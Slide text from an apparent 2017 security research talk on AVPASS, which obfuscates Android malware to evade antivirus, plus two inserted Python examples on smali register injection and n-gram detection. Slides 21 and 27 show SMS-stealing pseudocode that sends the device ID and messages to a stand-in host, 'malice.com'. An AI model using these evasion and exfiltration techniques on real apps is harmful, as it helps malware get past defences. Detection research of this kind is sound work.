AVPASS: Automatically Bypassing Android Malware Detection System - PowerPoint PPT Presentation


  1. AVPASS: Automatically Bypassing Android Malware Detection System Jinho Jung, Chanil Jeon, Max Wolotsky, Insu Yun, and Taesoo Kim Georgia Institute of Technology, July 27, 2017

  2. About Us
     - SSLab (@GT)
       ✓ Focusing on system and security research
       ✓ https://sslab.gtisc.gatech.edu/
     - ISTC-ARSA
       ✓ Intel Science & Technology Center for Adversary-Resilient Security Analytics
       ✓ Strengthening the analytics behind malware detection
       ✓ http://www.iisp.gatech.edu/intel-arsa-center-georgia-tech/

  3. In This Talk, We Will Introduce AVPASS
     - Transform any Android malware to bypass AVs
       ✓ By inferring AV features and rules
       ✓ By obfuscating Android binary (APK)
       ✓ Yet supports preventing code leakage

  4. Trend: Android Dominates Mobile OS Market
     Android still leads the mobile market; regained share over iOS to achieve an 86 percent …
     Sources: http://www.businessinsider.com/smartphone-market-share-android-ios-windows-blackberry-2016-8 and http://www.gartner.com/newsroom/id/3415117

  5. Problem: Android Malware Becomes More Prevalent
     8,400 new Android malware samples every day; security experts expect around 3.5 million new Android malware apps for 2017.
     Source: https://www.gdatasoftware.com/blog/2017/04/29712-8-400-new-android-malware-samples-every-day

  6. One Solution: Protecting Mobile Devices with Anti-Virus
     There are over 50 Android anti-virus products on the market.
     Source: https://www.av-test.org/en/antivirus/mobile-devices/

  7. Unfortunately, AV Solutions Are Known to be Weak (example: Java malware)
     * Developing Managed Code Rootkits for the Java Runtime Environment, Benjamin Holland, DEFCON 24

  8. What About Android Malware? (figure: labels "Malware!", "Malware")

  9. What About Android Malware? How easy is it to bypass AV software? (figure: labels "Malware!", "Malware", "Benign App")

  10. Challenges: Bypassing Unknown AV Solutions
      ① Transforming without destroying malicious features
      ② No pre-knowledge of AV features
      ③ Interact without leaking own malicious features
      (figure: labels "Malware!", "Malware", "Benign App")

  11. Approaches: Automatically Inferring and Obfuscating Detection Features
      - Obfuscating individual features
      - Inferring features and detection rules of AVs
      - Bypass AVs by using inferred features and rules
        ✓ Yet minimize information leaking by sending fake malware

  12. Summary of AVPASS Operation
      - Bypassed most AVs with 3.42 / 58 (5.8%) detections
      - Discovered 5 strong, 3 normal, and 2 weak impact features of AVs
      - Discovered bypassing rule combinations (about 30%)
      - Prevented code leakage when querying by using Imitation Mode

  13. AVPASS Overview and Workflow
      ① Binary Obfuscation (figure: Malware → Disguised & Bypass)
      ② Inferring Features & Rules
      ③ Query Safely

  14. What is Binary Obfuscation?
      Obfuscation targets: Method, API, Interaction, Resource, Class, Data-flow, String, Variable, Payload, Package
      Encrypt & remove features → Obfuscated Application ("I look different, but maintain the same behaviors")

  15. Main Obfuscation Features
      Number  Obfuscation Primitives                      Side-Effects
      1       Component interaction injection             N/A
      2       Dataflow analysis avoiding code injection   N/A
      3       String encryption                           N/A
      4       Variable name encryption                    N/A
      5       Package name encryption                     N/A
      6       Method and Class name encryption            N/A
      7       Dummy API and benign class injection        N/A
      8       Bytecode injection                          N/A
      9       Java reflection transformation              N/A
      10      Resource encryption (xml and image)         Appearance

  16. APK Obfuscation Requirements
      - Ensure APK's original functionalities
        ✓ Error-free "smali" code injection (* smali: disassembled code of the DEX format)
      - Should be difficult to de-obfuscate or reverse
        ✓ Increase obfuscation complexities
        ✓ E.g., hide all APIs by using Java reflection
        ✓ E.g., encrypt all strings with different encryption keys
        ✓ E.g., apply obfuscation multiple times

  17. Easy Problem: Available Number of Registers
      Before injection (registers v0 – v3):
          .method public DoSomething()
              .locals 4
              # register: v0 – v3 used here
          .end method
      Try injection (registers v0 – v4):
          .method public DoSomething()
              .locals 5 (+1)
              # register: v1 – v4 used here
              # code injection using v0
          .end method
      Increase the maximum number of locals and shift all registers and parameters.

  18. Tricky Problem: Limited Number of Registers
      Before injection (total: 14 registers; v0 – v3 locals, v4 – v13 hold p0 – p9):
          .method public DoSomething(p0…p9)
              .locals 4
              # register: v0 – v3 used here
              # parameter: p0 – p9 used here
          .end method
      Try injection (total: 17 registers; parameters shift to v7 – v16):
          .method public DoSomething(p0…p9)
              .locals 7 (+3)
              # register: v0 – v3 used here
              # parameter: p0 – p9 used here
              # instruction using p10 (v16) → instruction range error (> v15)
          .end method

  19. Solution: Backup and Restore Before Injection
      Before injection (as on slide 18):
          .method public DoSomething(p0…p9)
              .locals 4
              # register: v0 – v3 used here
              # parameter: p0 – p9 used here
          .end method
      Try injection:
          .method public DoSomething(p0…p9)
              .locals 7 (+3)
              # register: v0 – v3 used here
              # parameter: p0 – p9 used here
              ① backup registers v3 – v12 (into v13 … v23)
              ② code injection using v0 – v2
              ③ restore registers v3 – v12
          .end method
      Why tricky? AVPASS needs to trace the type of each register when backing up and restoring.
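The register accounting behind slides 17–19, as an added example (not the talk's or AVPASS's own code): it counts the parameter registers of a Dalvik method descriptor, maps them onto v-registers after the locals, and reports which parameters would land above v15 once extra locals are added, which is the point at which the backup/restore step becomes necessary. It assumes, as the slide does, that the injected instructions use 4-bit register operands (so v15 is the usable limit); the descriptors in the tests are constructed.

```python
# Dalvik register accounting for the smali injection on slides 17-19 (added example).
WIDE = {"J", "D"}          # long and double occupy two registers each
MAX_4BIT_REGISTER = 15     # highest register a 4-bit operand field can name (slide: "> v15")

def param_registers(descriptor, is_static):
    """Count parameter registers of a Dalvik descriptor such as '(ILjava/lang/String;J)V'."""
    params = descriptor[descriptor.index("(") + 1:descriptor.index(")")]
    count = 0 if is_static else 1           # implicit 'this' occupies p0
    i = 0
    while i < len(params):
        while params[i] == "[":             # array: one register whatever the element type
            i += 1
        if params[i] == "L":                # object type Lpkg/Class; ends at ';'
            i = params.index(";", i) + 1
            count += 1
        else:
            count += 2 if params[i] in WIDE else 1
            i += 1
    return count

def register_map(locals_count, param_count):
    """Parameters sit in the highest registers, right after the locals: p0 = v<locals>."""
    return {f"p{k}": f"v{locals_count + k}" for k in range(param_count)}

def injection_check(locals_count, descriptor, is_static, extra_locals):
    """Report what happens to the parameters when `extra_locals` registers are added."""
    nparams = param_registers(descriptor, is_static)
    new_locals = locals_count + extra_locals
    mapping = register_map(new_locals, nparams)
    pushed_out = [p for p, v in mapping.items() if int(v[1:]) > MAX_4BIT_REGISTER]
    return {
        "total": new_locals + nparams,        # slide 18: 14 before, 17 after
        "map": mapping,
        "out_of_range": pushed_out,           # no longer reachable by a 4-bit operand field
        "needs_backup_restore": bool(pushed_out),
    }
```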

  20. Difficult to Reverse as Requirement
      Too easy to detect obfuscation?
      - True, but it doesn't help AVs much
        ✓ How could you tell benign from malicious?
      - Dynamic analysis can detect original behavior
        ✓ However, code coverage is another challenge
        ✓ Not that practical due to overhead

  21. Example: Difficult to Reverse
          public class SendToNetwork (Service) {
              public void onStartCommand(Intent) {
                  String SMSmsg = intent.get("sms");
                  TelephonyMgr tm = new TelephonyMgr();
                  String ID = tm.getDeviceID();
                  String output = ID.concat(SMSmsg);
                  URL url = new URL("http://malice.com");
                  url.sendData(output);
              }
          }

  22. Example: Difficult to Reverse
      (figure: the SendToNetwork code of slide 21 with each API call routed through a reflection wrapper, Reflection Wrapper1 – Wrapper5, each resolving its target from a class name and a method name (Reflection1 – Reflection5); the "http://malice.com" literal is replaced by an encrypted message (String Enc1) that String Encryptor1 decrypts with a decryption key)

  23. Example: Difficult to Reverse
      (figure: as slide 22, but the class names and method names fed to the reflection wrappers, and the decryption key itself, are encrypted strings too: String Enc2 – Enc13)

  24. Example: Difficult to Reverse
      (figure: as slide 23, after a further round of obfuscation that adds yet more encrypted strings: String Enc14, Enc15 and String Enc N … N+5)
      Yes, you can tell there is obfuscation here, but it is difficult to reverse.

  25. Start with Well-known Detection Techniques
      - API-based detection
      - Dataflow-based detection
      - Interaction-based detection
      - Signature-based detection

  26. Android Malware Example: SMS Leaking Malware
      Component InterceptSMS: an SMS is received and intercepted by a background Service.
      Component SendToNetwork: sends the intercepted SMS message to malice.com, where the hacker collects the leaked information.

  27. API-based Android Malware Detection
      Component: InterceptSMS
          public class InterceptSMS (BroadcastReceiver) {
              public void onReceive() {
                  SmsMessage msg = SmsMessage.create();
                  String SMS = msg.getMessageBody();
                  Intent si = new Intent(Malicious.class);
                  si.putExtra("sms", SMS);
                  startService(si);
              }
          }
      Component: SendToNetwork
          public class SendToNetwork (Service) {
              public void onStartCommand(Intent) {
                  String SMSmsg = intent.get("sms");
                  TelephonyMgr tm = new TelephonyMgr();
                  String ID = tm.getDeviceID();
                  String output = ID.concat(SMSmsg);
                  URL url = new URL("http://malice.com");
                  url.sendData(output);
              }
          }
      Detection: the ordered API calls form a suspicious API sequence (n-gram).
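The API-sequence (n-gram) detection of this slide run over smali, as an added example that is not part of the talk or of the AVPASS tool. The smali fragments, the signature n-grams and the class names in them are constructed for the example (the slide's pseudo-API URL.sendData is stood in for by the real URLConnection.getOutputStream), and it goes one step beyond the slide by also scoring how much of a method's calls go through reflection, which is what an analyst is left with once the direct API calls have been hidden as in slides 22–24.

```python
import re
# Constructed smali fragments (illustrative, not taken from the page) for the two components above.
INTERCEPT_SMS = """
    invoke-virtual {v0}, Landroid/telephony/SmsMessage;->getMessageBody()Ljava/lang/String;
    invoke-virtual {v2, v3, v1}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
    invoke-virtual {p1, v2}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
"""
SEND_TO_NETWORK = """
    invoke-virtual {v0}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;
    invoke-virtual {v1, v2}, Ljava/lang/String;->concat(Ljava/lang/String;)Ljava/lang/String;
    invoke-virtual {v3}, Ljava/net/URLConnection;->getOutputStream()Ljava/io/OutputStream;
"""
# The same service after reflection wrapping: only the reflection plumbing is still visible.
SEND_REFLECTED = """
    invoke-static {v4}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
    invoke-virtual {v5, v6, v7}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
    invoke-virtual {v8, v0, v9}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
    invoke-virtual {v8, v3, v9}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
"""

INVOKE = re.compile(r"invoke-\w+(?:/range)?\s+\{[^}]*\},\s+(L[^;]+;->\w+)")

# Hypothetical n-gram signatures: ordered API sequences that characterise the SMS leak.
SIGNATURES = {
    "sms-intercept": ("Landroid/telephony/SmsMessage;->getMessageBody",
                      "Landroid/content/Intent;->putExtra",
                      "Landroid/content/Context;->startService"),
    "sms-exfil": ("Landroid/telephony/TelephonyManager;->getDeviceId",
                  "Ljava/lang/String;->concat",
                  "Ljava/net/URLConnection;->getOutputStream"),
}
REFLECTION = {"Ljava/lang/Class;->forName", "Ljava/lang/Class;->getMethod",
              "Ljava/lang/reflect/Method;->invoke"}

def api_sequence(smali):
    """Ordered list of callee 'Lclass;->method' for every invoke-* instruction."""
    return INVOKE.findall(smali)

def ngrams(seq, n):
    return {tuple(seq[i:i + n]) for i in range(len(seq) - n + 1)}

def scan(smali):
    seq = api_sequence(smali)
    hits = sorted(name for name, sig in SIGNATURES.items() if sig in ngrams(seq, len(sig)))
    reflective = sum(1 for api in seq if api in REFLECTION)
    # Once calls go through reflection the n-grams no longer match; the share of reflection
    # APIs with no visible callee is what the analyst has left to score on.
    return {"apis": seq, "signatures": hits,
            "reflection_ratio": reflective / len(seq) if seq else 0.0}
```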
